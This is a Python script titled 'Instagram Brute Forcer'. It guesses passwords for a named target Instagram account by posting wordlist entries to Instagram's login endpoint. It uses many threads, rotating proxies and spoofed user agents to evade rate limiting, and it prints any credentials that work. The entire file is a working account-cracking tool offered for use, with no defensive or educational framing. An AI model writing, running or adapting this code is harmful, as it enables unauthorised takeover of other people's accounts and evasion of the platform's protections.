# coding=utf-8 ############################################################################### # Instagram Brute Forcer # Developed By Hak9 # xhak9x@jabber.de # !/usr/bin/python ############################################################################### from __future__ import print_function import argparse import logging import random import socket import sys import threading try: import urllib.request as rq from urllib.error import HTTPError import urllib.parse as http_parser except ImportError: import urllib2 as rq from urllib2 import HTTPError import urllib as http_parser try: import Queue except ImportError: import queue as Queue class bcolors: HEADER = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def check_proxy(q): """ check proxy for and append to working proxies :param q: """ if not q.empty(): proxy = q.get(False) proxy = proxy.replace("\r", "").replace("\n", "") try: opener = rq.build_opener( rq.ProxyHandler({'https': 'https://' + proxy}), rq.HTTPHandler(), rq.HTTPSHandler() ) opener.addheaders = [('User-agent', 'Mozilla/5.0')] rq.install_opener(opener) req = rq.Request('https://api.ipify.org/') if rq.urlopen(req).read().decode() == proxy.partition(':')[0]: proxys_working_list.update({proxy: proxy}) if _verbose: print(bcolors.OKGREEN + " --[+] ", proxy, " | PASS" + bcolors.ENDC) else: if _verbose: print(" --[!] ", proxy, " | FAILED") except Exception as err: if _verbose: print(" --[!] ", proxy, " | FAILED") if _debug: logger.error(err) pass def get_csrf(): """ get CSRF token from login page to use in POST requests """ global csrf_token print(bcolors.WARNING + "[+] Getting CSRF Token: " + bcolors.ENDC) try: opener = rq.build_opener(rq.HTTPHandler(), rq.HTTPSHandler()) opener.addheaders = [('User-agent', 'Mozilla/5.0')] rq.install_opener(opener) request = rq.Request('https://www.instagram.com/') try: # python 2 headers = rq.urlopen(request).info().headers except Exception: # python 3 headers = rq.urlopen(request).info().get_all('Set-Cookie') for header in headers: if header.find('csrftoken') != -1: csrf_token = header.partition(';')[0].partition('=')[2] print(bcolors.OKGREEN + "[+] CSRF Token :", csrf_token, "\n" + bcolors.ENDC) except Exception as err: print(bcolors.FAIL + "[!] Can't get CSRF token , please use -d for debug" + bcolors.ENDC) if _debug: logger.error(err) print(bcolors.FAIL + "[!] Exiting..." + bcolors.ENDC) exit(3) def brute(q): """ main worker function :param word: :param event: :return: """ if not q.empty(): try: proxy = None if len(proxys_working_list) != 0: proxy = random.choice(list(proxys_working_list.keys())) word = q.get() word = word.replace("\r", "").replace("\n", "") post_data = { 'username': USER, 'password': word, } header = { "User-Agent": random.choice(user_agents), 'X-Instagram-AJAX': '1', "X-CSRFToken": csrf_token, "X-Requested-With": "XMLHttpRequest", "Referer": "https://www.instagram.com/", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 'Cookie': 'csrftoken=' + csrf_token } if proxy: if _verbose: print(bcolors.BOLD + "[*] Trying %s %s " % (word, " | " + proxy,) + bcolors.ENDC) opener = rq.build_opener( rq.ProxyHandler({'https': 'https://' + proxy}), rq.HTTPHandler(), rq.HTTPSHandler() ) else: if _verbose: print(bcolors.BOLD + "[*] Trying %s" % (word,) + bcolors.ENDC) opener = rq.build_opener( rq.HTTPHandler(), rq.HTTPSHandler() ) rq.install_opener(opener) req = rq.Request(URL, data=http_parser.urlencode(post_data).encode('ascii'), headers=header) sock = rq.urlopen(req) if sock.read().decode().find('"authenticated": true') != -1: print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login:") print("---------------------------------------------------") print("[!]Username: ", USER) print("[!]Password: ", word) print("---------------------------------------------------\n" + bcolors.ENDC) found_flag = True q.queue.clear() q.task_done() except HTTPError as e: if e.getcode() == 400 or e.getcode() == 403: if e.read().decode("utf8", 'ignore').find('"checkpoint_required"') != -1: print(bcolors.OKGREEN + bcolors.BOLD + "\n[*]Successful Login " + bcolors.FAIL + "But need Checkpoint :|" + bcolors.OKGREEN) print("---------------------------------------------------") print("[!]Username: ", USER) print("[!]Password: ", word) print("---------------------------------------------------\n" + bcolors.ENDC) found_flag = True q.queue.clear() q.task_done() return elif proxy: print(bcolors.WARNING + "[!]Error: Proxy IP %s is now on Instagram jail , Removing from working list !" % (proxy,) + bcolors.ENDC ) if proxy in proxys_working_list: proxys_working_list.pop(proxy) print(bcolors.OKGREEN + "[+] Online Proxy: ", str(len(proxys_working_list)) + bcolors.ENDC) else: print(bcolors.FAIL + "[!]Error : Your Ip is now on Instagram jail ," " script will not work fine until you change your ip or use proxy" + bcolors.ENDC) else: print("Error:", e.getcode()) q.task_done() return except Exception as err: if _debug: print(bcolors.FAIL + "[!] Unknown Error in request." + bcolors.ENDC) logger.error(err) else: print(bcolors.FAIL + "[!] Unknown Error in request, please turn on debug mode with -d" + bcolors.ENDC) pass return def starter(): """ threading workers initialize """ global found_flag queue = Queue.Queue() threads = [] max_thread = THREAD found_flag = False queuelock = threading.Lock() print(bcolors.HEADER + "\n[!] Initializing Workers") print("[!] Start Cracking ... \n" + bcolors.ENDC) try: for word in words: queue.put(word) while not queue.empty(): queuelock.acquire() for workers in range(max_thread): t = threading.Thread(target=brute, args=(queue,)) t.setDaemon(True) t.start() threads.append(t) for t in threads: t.join() queuelock.release() if found_flag: break print(bcolors.OKGREEN + "\n--------------------") print("[!] Brute complete !" + bcolors.ENDC) except Exception as err: print(err) def check_avalaible_proxys(proxys): """ check avalaible proxyies from proxy_list file """ socket.setdefaulttimeout(30) global proxys_working_list print(bcolors.WARNING + "[-] Testing Proxy List...\n" + bcolors.ENDC) proxys_working_list = {} max_thread = THREAD queue = Queue.Queue() queuelock = threading.Lock() threads = [] for proxy in proxys: queue.put(proxy) while not queue.empty(): queuelock.acquire() for workers in range(max_thread): t = threading.Thread(target=check_proxy, args=(queue,)) t.setDaemon(True) t.start() threads.append(t) for t in threads: t.join() queuelock.release() print(bcolors.OKGREEN + "[+] Online Proxy: " + bcolors.BOLD + str(len(proxys_working_list)) + bcolors.ENDC + "\n") if __name__ == "__main__": parser = argparse.ArgumentParser( description="Instagram BruteForcer", epilog="./instabrute -u user_test -w words.txt -p proxys.txt -t 4 -d -v" ) # required argument parser.add_argument('-u', '--username', action="store", required=True, help='Target Username') parser.add_argument('-w', '--word', action="store", required=True, help='Words list path') parser.add_argument('-p', '--proxy', action="store", required=True, help='Proxy list path') # optional arguments parser.add_argument('-t', '--thread', help='Thread', type=int, default=4) parser.add_argument('-v', '--verbose', action='store_const', help='Thread', const=True, default=False) parser.add_argument('-d', '--debug', action='store_const', const=True, help='Debug mode', default=False) args = parser.parse_args() URL = "https://www.instagram.com/accounts/login/ajax/" USER = args.username THREAD = args.thread _verbose = args.verbose _debug = args.debug user_agents = ["Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko)", "Mozilla/5.0 (Linux; U; Android 2.3.5; en-us; HTC Vision Build/GRI40) AppleWebKit/533.1", "Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko)", "Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201", "Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0", "Mozilla/5.0 (Windows; U; MSIE 9.0; WIndows NT 9.0; en-US))"] try: words = open(args.word).readlines() except IOError: print("[-] Error: Check your word list file path\n") sys.exit(1) try: proxys = open(args.proxy).readlines() except IOError: print("[-] Error: Check your proxy list file path\n") sys.exit(1) # enable debugging if its set if _debug: # Logging stuff logging.basicConfig(level=logging.DEBUG, filename="log", format='%(asctime)s - %(name)s - %(levelname)s - %(message)s') logger = logging.getLogger(__name__) print(bcolors.HEADER + """.-------------------------------------------------------.""") print("""| _____ _ ______ _ |""") print("""||_ _| | | | ___ \ | | |""") print("""| | | _ __ ___| |_ __ _ | |_/ /_ __ _ _| |_ ___ |""") print("""| | || '_ \/ __| __/ _` | | ___ \ '__| | | | __/ _ \ |""") print("""| _| || | | \__ \ || (_| | | |_/ / | | |_| | || __/ |""") print("""| \___/_| |_|___/\__\__,_| \____/|_| \__,_|\__\___| |""") print("""| |""") print("""'-------------------------------------------------------'""") print(bcolors.OKGREEN + "[+] Username Loaded:", bcolors.BOLD + USER + bcolors.ENDC) print(bcolors.OKGREEN + "[+] Words Loaded:", bcolors.BOLD + str(len(words)) + bcolors.ENDC) print(bcolors.OKGREEN + "[+] Proxy Loaded:", bcolors.BOLD + str(len(proxys)) + bcolors.ENDC) print(bcolors.ENDC) check_avalaible_proxys(proxys) get_csrf() starter()